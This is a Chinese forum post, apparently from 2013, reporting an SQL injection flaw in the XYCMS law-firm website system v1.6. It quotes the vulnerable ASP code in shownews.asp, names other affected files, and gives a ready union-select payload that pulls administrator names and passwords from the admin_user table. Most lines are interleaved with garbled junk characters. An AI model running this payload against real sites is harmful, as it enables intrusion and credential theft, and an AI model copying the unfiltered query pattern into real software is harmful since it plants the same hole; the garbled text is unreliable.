前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
6 }6 v/ Q$ I0 t! _6 C1 Q( { - L. }6 r8 e6 d# t8 r' R
淫荡分割线+ |- F) S! e, ]' F: g" X u8 R1 J
--------------------------------------------------------- U: B+ `% o# O. j" H2 y; W
, q8 y8 k: q9 }7 ^审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
- n" [( p' J' f' Z源码地址:http://down.chinaz.com/soft/29233.htm8 a7 F! h, |; M
# }# Z/ Z- k- G6 a5 ^6 l漏洞文件:shownews.asp
& L' ]: e' m8 p# K( F1 G+ Y) l漏洞代码:7-13行2 E* V( [; U; G7 n- }
6 g; n$ `( k& J. Y, m+ m+ j6 f+ Q + K' L% B) }+ `4 f# i6 h
<% 3 B, d3 V8 \( G
id=request.QueryString("id")5 f3 a! o; C ]1 j: I) X% u9 g+ |/ e8 P
7 ^7 o5 r8 @' M9 ^set snews=server.createobject("adodb.recordset") * Z6 @5 q1 ^; R: Y- d, b" G
exec="select * from [news] where id="&id
+ L- C; q4 V( ^# qsnews.open exec,conn,1,1
1 S1 O4 E8 P% w$ b! k: u9 i%>
8 P z( u; n& g) s & Y& l, `- B! D* L/ b) d3 D
, k6 t" k; p: }* Q# {: Z. w5 N7 o5 Z什么过滤都没有 直造成注入
C% w8 @1 C! k" Z
4 J3 p9 M5 {0 E) Y* z注入点:http://127.0.0.1:99/shownews.asp?id=xx! r5 G/ o+ }' s# O# I/ V
) }, _/ s w3 R+ h$ c
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
8 s$ s2 I, P) D6 A
. y7 H5 G+ F1 a! a' f5 p7 D6 Q. W% L
+ D$ i6 A. ?' T( u: L: |: Lexp: union select 1,admin,password,4,5,7 from admin_user
4 I! @. M( m4 k: x( I* p5 m: Q# V& r: e5 }0 Y5 J# v
|
发表于 2013-4-4 17:28:12
收藏
支持
反对